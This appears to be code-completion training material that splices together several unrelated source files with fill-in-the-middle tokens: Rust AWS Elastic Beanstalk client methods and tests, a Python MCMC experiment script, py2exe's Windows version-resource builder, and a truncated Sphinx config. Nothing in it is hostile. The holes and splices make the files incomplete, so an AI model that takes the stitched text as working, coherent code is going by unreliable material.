stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(TerminateEnvironmentError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Updates the specified application to have the specified properties.</p> <note> <p>If a property (for example, <code>description</code>) is not provided, the value remains unchanged. 
To clear these properties, specify an empty string.</p> </note>"] fn update_application(&self, input: &UpdateApplicationMessage) -> Result<ApplicationDescriptionMessage, UpdateApplicationError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "UpdateApplication"); params.put("Version", "2010-12-01"); UpdateApplicationMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ApplicationDescriptionMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ApplicationDescriptionMessageDeserializer::deserialize("UpdateApplicationResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(UpdateApplicationError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Modifies lifecycle settings for an application.</p>"] fn update_application_resource_lifecycle(&self, input: &UpdateApplicationResourceLifecycleMessage) -> Result<ApplicationResourceLifecycleDescriptionMessage, UpdateApplicationResourceLifecycleError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "UpdateApplicationResourceLifecycle"); params.put("Version", "2010-12-01"); UpdateApplicationResourceLifecycleMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ApplicationResourceLifecycleDescriptionMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ApplicationResourceLifecycleDescriptionMessageDeserializer::deserialize("UpdateApplicationResourceLifecycleResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(UpdateApplicationResourceLifecycleError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Updates the specified application version to have the specified properties.</p> <note> <p>If a property (for example, <code>description</code>) is not provided, the value remains unchanged. 
To clear properties, specify an empty string.</p> </note>"] fn update_application_version(&self, input: &UpdateApplicationVersionMessage) -> Result<ApplicationVersionDescriptionMessage, UpdateApplicationVersionError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "UpdateApplicationVersion"); params.put("Version", "2010-12-01"); UpdateApplicationVersionMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ApplicationVersionDescriptionMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ApplicationVersionDescriptionMessageDeserializer::deserialize("UpdateApplicationVersionResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(UpdateApplicationVersionError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Updates the specified configuration template to have the specified properties or configuration option values.</p> <note> <p>If a property (for example, <code>ApplicationName</code>) is not provided, its value remains unchanged. To clear such properties, specify an empty string.</p> </note> <p>Related Topics</p> <ul> <li> <p> <a>DescribeConfigurationOptions</a> </p> </li> </ul>"] fn update_configuration_template(&self, input: &UpdateConfigurationTemplateMessage) -> Result<ConfigurationSettingsDescription, UpdateConfigurationTemplateError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "UpdateConfigurationTemplate"); params.put("Version", "2010-12-01"); UpdateConfigurationTemplateMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ConfigurationSettingsDescription::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ConfigurationSettingsDescriptionDeserializer::deserialize("UpdateConfigurationTemplateResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(UpdateConfigurationTemplateError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Updates the environment description, deploys a new application version, updates the configuration settings to an entirely new configuration template, or updates select configuration option values in the running environment.</p> <p> Attempting to update both the release and configuration is not allowed and AWS Elastic 
Beanstalk returns an <code>InvalidParameterCombination</code> error. </p> <p> When updating the configuration settings to a new template or individual settings, a draft configuration is created and <a>DescribeConfigurationSettings</a> for this environment returns two setting descriptions with different <code>DeploymentStatus</code> values. </p>"] fn update_environment(&self, input: &UpdateEnvironmentMessage) -> Result<EnvironmentDescription, UpdateEnvironmentError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "UpdateEnvironment"); params.put("Version", "2010-12-01"); UpdateEnvironmentMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = EnvironmentDescription::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(EnvironmentDescriptionDeserializer::deserialize("UpdateEnvironmentResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(UpdateEnvironmentError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Takes a set of configuration settings and either a configuration template or environment, and determines whether those values are valid.</p> <p>This action returns a list of messages indicating any errors or warnings associated with the selection of option values.</p>"] fn validate_configuration_settings(&self, input: &ValidateConfigurationSettingsMessage) -> Result<ConfigurationSettingsValidationMessages, ValidateConfigurationSettingsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "ValidateConfigurationSettings"); params.put("Version", "2010-12-01"); ValidateConfigurationSettingsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ConfigurationSettingsValidationMessages::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ConfigurationSettingsValidationMessagesDeserializer::deserialize("ValidateConfigurationSettingsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(ValidateConfigurationSettingsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } } #[cfg(test)] mod protocol_tests { extern crate rusoto_mock; use super::*; use self::rusoto_mock::*; use rusoto_core::Region as rusoto_region; #[test] fn 
test_parse_valid_elasticbeanstalk_check_dns_availability() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-check-dns-availability.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = CheckDNSAvailabilityMessage::default(); let result = client.check_dns_availability(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_create_application_version() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-create-application-version.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = CreateApplicationVersionMessage::default(); let result = client.create_application_version(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_create_application() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-create-application.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = CreateApplicationMessage::default(); let result = client.create_application(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_create_configuration_template() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-create-configuration-template.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = CreateConfigurationTemplateMessage::default(); let result = client.create_configuration_template(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_create_environment() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-create-environment.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = CreateEnvironmentMessage::default(); let result = client.create_environment(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_create_storage_location() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-create-storage-location.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let result = client.create_storage_location(); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_delete_application() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-delete-application.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, 
MockCredentialsProvider, rusoto_region::UsEast1); let request = DeleteApplicationMessage::default(); let result = client.delete_application(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_describe_application_versions() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-describe-application-versions.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = DescribeApplicationVersionsMessage::default(); let result = client.describe_application_versions(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_describe_applications() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-describe-applications.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = DescribeApplicationsMessage::default(); let result = client.describe_applications(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_describe_configuration_options() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-describe-configuration-options.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = DescribeConfigurationOptionsMessage::default(); let result = client.describe_configuration_options(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_describe_environments() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-describe-environments.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = DescribeEnvironmentsMessage::default(); let result = client.describe_environments(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_describe_events() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-describe-events.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = DescribeEventsMessage::default(); let result = client.describe_events(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_list_available_solution_stacks() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-list-available-solution-stacks.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let result = client.list_available_solution_stacks(); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_retrieve_environment_info() { 
let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-retrieve-environment-info.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = RetrieveEnvironmentInfoMessage::default(); let result = client.retrieve_environment_info(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_terminate_environment() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-terminate-environment.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = TerminateEnvironmentMessage::default(); let result = client.terminate_environment(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_update_application_version() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-update-application-version.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = UpdateApplicationVersionMessage::default(); let result = client.update_application_version(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_update_application() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-update-application.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = UpdateApplicationMessage::default(); let result = client.update_application(&request); assert!(result.is_ok(), "parse error: {:?}", result); } }<|fim▁end|>
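// Reviewer note: every generated operation in the record above repeats one
// Query-protocol skeleton; distilled here as a comment-only sketch. All
// identifiers are taken verbatim from the code above, with OPERATION as a
// placeholder, so this is a reading aid rather than new API surface:
//
//   let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/");
//   let mut params = Params::new();
//   params.put("Action", "OPERATION");          // Query action name, e.g. UpdateEnvironment
//   params.put("Version", "2010-12-01");        // fixed Elastic Beanstalk API version
//   OperationMessageSerializer::serialize(&mut params, "", &input);
//   request.set_params(params);
//   request.sign(&try!(self.credentials_provider.credentials()));  // SigV4 signing
//   let response = try!(self.dispatcher.dispatch(&request));
//   // StatusCode::Ok => walk the XML body with EventReader and deserialize the
//   //                   "OPERATIONResult" element (or Default::default() when empty);
//   // anything else  => OperationError::from_body(...) built from the raw body.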
<|file_name|>glass_ard_ground_truth.py<|end_file_name|><|fim▁begin|>""" This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version. Written (W) 2013 Heiko Strathmann """ from kameleon_mcmc.distribution.Gaussian import Gaussian from kameleon_mcmc.experiments.SingleChainExperiment import SingleChainExperiment from kameleon_mcmc.gp.GPData import GPData from kameleon_mcmc.gp.mcmc.PseudoMarginalHyperparameterDistribution import PseudoMarginalHyperparameterDistribution from kameleon_mcmc.kernel.GaussianKernel import GaussianKernel from kameleon_mcmc.mcmc.MCMCChain import MCMCChain from kameleon_mcmc.mcmc.MCMCParams import MCMCParams from kameleon_mcmc.mcmc.output.PlottingOutput import PlottingOutput from kameleon_mcmc.mcmc.output.StatisticsOutput import StatisticsOutput from kameleon_mcmc.mcmc.samplers.AdaptiveMetropolisLearnScale import AdaptiveMetropolisLearnScale from kameleon_mcmc.mcmc.samplers.KameleonWindowLearnScale import KameleonWindowLearnScale from kameleon_mcmc.mcmc.samplers.StandardMetropolis import StandardMetropolis from numpy.lib.twodim_base import eye from numpy.linalg.linalg import cholesky from numpy.ma.core import mean, ones, shape, asarray, zeros from numpy.ma.extras import cov from numpy.random import permutation, seed from scipy.linalg.basic import solve_triangular from kameleon_mcmc.experiments.ClusterTools import ClusterTools import os import sys if __name__ == '__main__': if len(sys.argv) != 3: print "usage:", str(sys.argv[0]).split(os.sep)[-1], "<experiment_dir_base> <number_of_experiments>" print "example:" print "python " + str(sys.argv[0]).split(os.sep)[-1] + " /nfs/nhome/live/ucabhst/kameleon_experiments/ 3" exit() experiment_dir_base = str(sys.argv[1]) n = int(str(sys.argv[2])) # loop over parameters here experiment_dir = experiment_dir_base + str(os.path.abspath(sys.argv[0])).split(os.sep)[-1].split(".")[0] + os.sep print "running experiments", n, "times at base", experiment_dir # load data data,labels=GPData.get_glass_data() # normalise and whiten dataset data-=mean(data, 0) L=cholesky(cov(data.T)) data=solve_triangular(L, data.T, lower=True).T dim=shape(data)[1] # prior on theta and posterior target estimate theta_prior=Gaussian(mu=0*ones(dim), Sigma=eye(dim)*5) distribution=PseudoMarginalHyperparameterDistribution(data, labels, \ n_importance=100, prior=theta_prior, \ ridge=1e-3) sigma = 23.0 print "using sigma", sigma kernel = GaussianKernel(sigma=sigma) for i in range(n): mcmc_samplers = []<|fim▁hole|> burnin=50000 num_iterations=500000 #mcmc_samplers.append(KameleonWindowLearnScale(distribution, kernel, stop_adapt=burnin)) #mean_est = zeros(distribution.dimension, dtype="float64") #cov_est = 1.0 * eye(distribution.dimension) #cov_est[0, 0] = distribution.V #mcmc_samplers.append(AdaptiveMetropolisLearnScale(distribution, mean_est=mean_est, cov_est=cov_est)) #mcmc_samplers.append(AdaptiveMetropolis(distribution, mean_est=mean_est, cov_est=cov_est)) mcmc_samplers.append(StandardMetropolis(distribution)) start = zeros(distribution.dimension, dtype="float64") mcmc_params = MCMCParams(start=start, num_iterations=num_iterations, burnin=burnin) mcmc_chains = [MCMCChain(mcmc_sampler, mcmc_params) for mcmc_sampler in mcmc_samplers] for mcmc_chain in mcmc_chains: mcmc_chain.append_mcmc_output(StatisticsOutput()) experiments = [SingleChainExperiment(mcmc_chain, experiment_dir) for mcmc_chain 
in mcmc_chains] for experiment in experiments: ClusterTools.submit_experiment(experiment)<|fim▁end|>
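# Reviewer note: the centering/whitening step in the record above (subtract the
# mean, then solve against the Cholesky factor of the covariance) is a standard
# transform; a minimal self-contained sketch with synthetic data -- shapes and
# names here are illustrative, not part of the recorded file:
import numpy as np
from numpy.linalg import cholesky
from scipy.linalg import solve_triangular

data = np.random.randn(200, 3) * np.array([1.0, 5.0, 0.2])  # anisotropic sample
data -= data.mean(axis=0)                          # remove the per-feature mean
L = cholesky(np.cov(data.T))                       # covariance factor, C = L @ L.T
white = solve_triangular(L, data.T, lower=True).T  # cov(white) is ~ the identity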
<|file_name|>VersionInfo.py<|end_file_name|><|fim▁begin|># -*- coding: latin-1 -*- ## ## Copyright (c) 2000, 2001, 2002, 2003 Thomas Heller ## ## Permission is hereby granted, free of charge, to any person obtaining ## a copy of this software and associated documentation files (the ## "Software"), to deal in the Software without restriction, including ## without limitation the rights to use, copy, modify, merge, publish, ## distribute, sublicense, and/or sell copies of the Software, and to ## permit persons to whom the Software is furnished to do so, subject to ## the following conditions: ## ## The above copyright notice and this permission notice shall be ## included in all copies or substantial portions of the Software. ## ## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, ## EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF ## MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND ## NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE ## LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION ## OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION ## WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ## # # $Id: VersionInfo.py 392 2004-03-12 17:00:21Z theller $ # # $Log$ # Revision 1.3 2004/01/16 10:45:31 theller # Move py2exe from the sandbox directory up to the root dir. # # Revision 1.3 2003/12/29 13:44:57 theller # Adapt for Python 2.3. # # Revision 1.2 2003/09/18 20:19:57 theller # Remove a 2.3 warning, but mostly this checkin is to test the brand new # py2exe-checkins mailing list. # # Revision 1.1 2003/08/29 12:30:52 mhammond # New py2exe now uses the old resource functions :) # # Revision 1.1 2002/01/29 09:30:55 theller # version 0.3.0 # # Revision 1.2 2002/01/14 19:08:05 theller # Better (?) Unicode handling. # # Revision 1.1 2002/01/07 10:30:32 theller # Create a version resource. 
# # import struct VOS_NT_WINDOWS32 = 0x00040004 VFT_APP = 0x00000001 RT_VERSION = 16 class VersionError(Exception): pass def w32_uc(text): """convert a string into unicode, then encode it into UTF-16 little endian, ready to use for win32 apis""" if type(text) is str: return unicode(text, "unicode-escape").encode("utf-16-le") return unicode(text).encode("utf-16-le") class VS_FIXEDFILEINFO: dwSignature = 0xFEEF04BDL dwStrucVersion = 0x00010000 dwFileVersionMS = 0x00010000 dwFileVersionLS = 0x00000001 dwProductVersionMS = 0x00010000 dwProductVersionLS = 0x00000001 dwFileFlagsMask = 0x3F dwFileFlags = 0 dwFileOS = VOS_NT_WINDOWS32 dwFileType = VFT_APP dwFileSubtype = 0 dwFileDateMS = 0 dwFileDateLS = 0 fmt = "13L" def __init__(self, version): import string version = string.replace(version, ",", ".") fields = string.split(version + '.0.0.0.0', ".")[:4] fields = map(string.strip, fields) try: self.dwFileVersionMS = int(fields[0]) * 65536 + int(fields[1]) self.dwFileVersionLS = int(fields[2]) * 65536 + int(fields[3]) except ValueError: raise VersionError, "could not parse version number '%s'" % version def __str__(self): return struct.pack(self.fmt, self.dwSignature, self.dwStrucVersion, self.dwFileVersionMS, self.dwFileVersionLS, self.dwProductVersionMS, self.dwProductVersionLS, self.dwFileFlagsMask, self.dwFileFlags, self.dwFileOS, self.dwFileType, self.dwFileSubtype, self.dwFileDateMS, self.dwFileDateLS) <|fim▁hole|>def align(data): pad = - len(data) % 4 return data + '\000' * pad class VS_STRUCT: items = () def __str__(self): szKey = w32_uc(self.name) ulen = len(szKey)+2 value = self.get_value() data = struct.pack("h%ss0i" % ulen, self.wType, szKey) + value data = align(data) for item in self.items: data = data + str(item) wLength = len(data) + 4 # 4 bytes for wLength and wValueLength wValueLength = len(value) return self.pack("hh", wLength, wValueLength, data) def pack(self, fmt, len, vlen, data): return struct.pack(fmt, len, vlen) + data def get_value(self): return "" class String(VS_STRUCT): wType = 1 items = () def __init__(self, (name, value)): self.name = name if value: self.value = value + '\000' # strings must be zero terminated else: self.value = value def pack(self, fmt, len, vlen, data): # ValueLength is measured in WORDS, not in BYTES! return struct.pack(fmt, len, vlen/2) + data def get_value(self): return w32_uc(self.value) class StringTable(VS_STRUCT): wType = 1 def __init__(self, name, strings): self.name = name self.items = map(String, strings) class StringFileInfo(VS_STRUCT): wType = 1 name = "StringFileInfo" def __init__(self, name, strings): self.items = [StringTable(name, strings)] class Var(VS_STRUCT): # MSDN says: # If you use the Var structure to list the languages your # application or DLL supports instead of using multiple version # resources, use the Value member to contain an array of DWORD # values indicating the language and code page combinations # supported by this file. The low-order word of each DWORD must # contain a Microsoft language identifier, and the high-order word # must contain the IBM® code page number. Either high-order or # low-order word can be zero, indicating that the file is language # or code page independent. If the Var structure is omitted, the # file will be interpreted as both language and code page # independent. 
wType = 0 name = "Translation" def __init__(self, value): self.value = value def get_value(self): return struct.pack("l", self.value) class VarFileInfo(VS_STRUCT): wType = 1 name = "VarFileInfo" def __init__(self, *names): self.items = map(Var, names) def get_value(self): return "" class VS_VERSIONINFO(VS_STRUCT): wType = 0 # 0: binary data, 1: text data name = "VS_VERSION_INFO" def __init__(self, version, items): self.value = VS_FIXEDFILEINFO(version) self.items = items def get_value(self): return str(self.value) class Version(object): def __init__(self, version, comments = None, company_name = None, file_description = None, internal_name = None, legal_copyright = None, legal_trademarks = None, original_filename = None, private_build = None, product_name = None, product_version = None, special_build = None): self.version = version strings = [] if comments is not None: strings.append(("Comments", comments)) if company_name is not None: strings.append(("CompanyName", company_name)) if file_description is not None: strings.append(("FileDescription", file_description)) strings.append(("FileVersion", version)) if internal_name is not None: strings.append(("InternalName", internal_name)) if legal_copyright is not None: strings.append(("LegalCopyright", legal_copyright)) if legal_trademarks is not None: strings.append(("LegalTrademarks", legal_trademarks)) if original_filename is not None: strings.append(("OriginalFilename", original_filename)) if private_build is not None: strings.append(("PrivateBuild", private_build)) if product_name is not None: strings.append(("ProductName", product_name)) strings.append(("ProductVersion", product_version or version)) if special_build is not None: strings.append(("SpecialBuild", special_build)) self.strings = strings def resource_bytes(self): vs = VS_VERSIONINFO(self.version, [StringFileInfo("040904B0", self.strings), VarFileInfo(0x04B00409)]) return str(vs) def test(): import sys sys.path.append("c:/tmp") from hexdump import hexdump version = Version("1, 0, 0, 1", comments = "ümläut comments", company_name = "No Company", file_description = "silly application", internal_name = "silly", legal_copyright = u"Copyright © 2003", ## legal_trademark = "", original_filename = "silly.exe", private_build = "test build", product_name = "silly product", product_version = None, ## special_build = "" ) hexdump(version.resource_bytes()) if __name__ == '__main__': import sys sys.path.append("d:/nbalt/tmp") from hexdump import hexdump test()<|fim▁end|>
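# Reviewer note: the key trick in VersionInfo.py above is that every
# VS_VERSIONINFO node is framed as <wLength, wValueLength, wType, szKey,
# padding, value, children>, with szKey zero-terminated UTF-16-LE and 32-bit
# alignment between parts (and wValueLength counted in WORDs for text nodes).
# A standalone Python 3 illustration of that framing (the recorded file itself
# is Python 2; this is an aside, not the recorded implementation):
import struct

def pad32(b):
    return b + b'\x00' * (-len(b) % 4)          # align to a 4-byte boundary

key = 'FileVersion\x00'.encode('utf-16-le')     # zero-terminated UTF-16-LE key
val = '1, 0, 0, 1\x00'.encode('utf-16-le')
tail = pad32(struct.pack('h', 1) + key) + val   # wType=1 marks a text node
node = struct.pack('hh', 4 + len(tail), len(val) // 2) + tail  # wLength, wValueLength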
<|file_name|>conf.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # Qcloud COS SDK for Python 3 documentation build configuration file, created by # cookiecutter pipproject # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys import os import sphinx_rtd_theme # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. sys.path.insert(0, os.path.abspath('../..')) # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ 'sphinx.ext.autodoc', ] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # source_suffix = ['.rst', '.md'] source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = 'Qcloud COS SDK for Python 3' copyright = '2016, Dan Su' author = 'Dan Su' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = '0.1.0' # The full version, including alpha/beta/rc tags. release = '0.1.0' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This patterns also effect to html_static_path and html_extra_path exclude_patterns = [] # The reST default role (used for this markup: `text`) to use for all # documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are 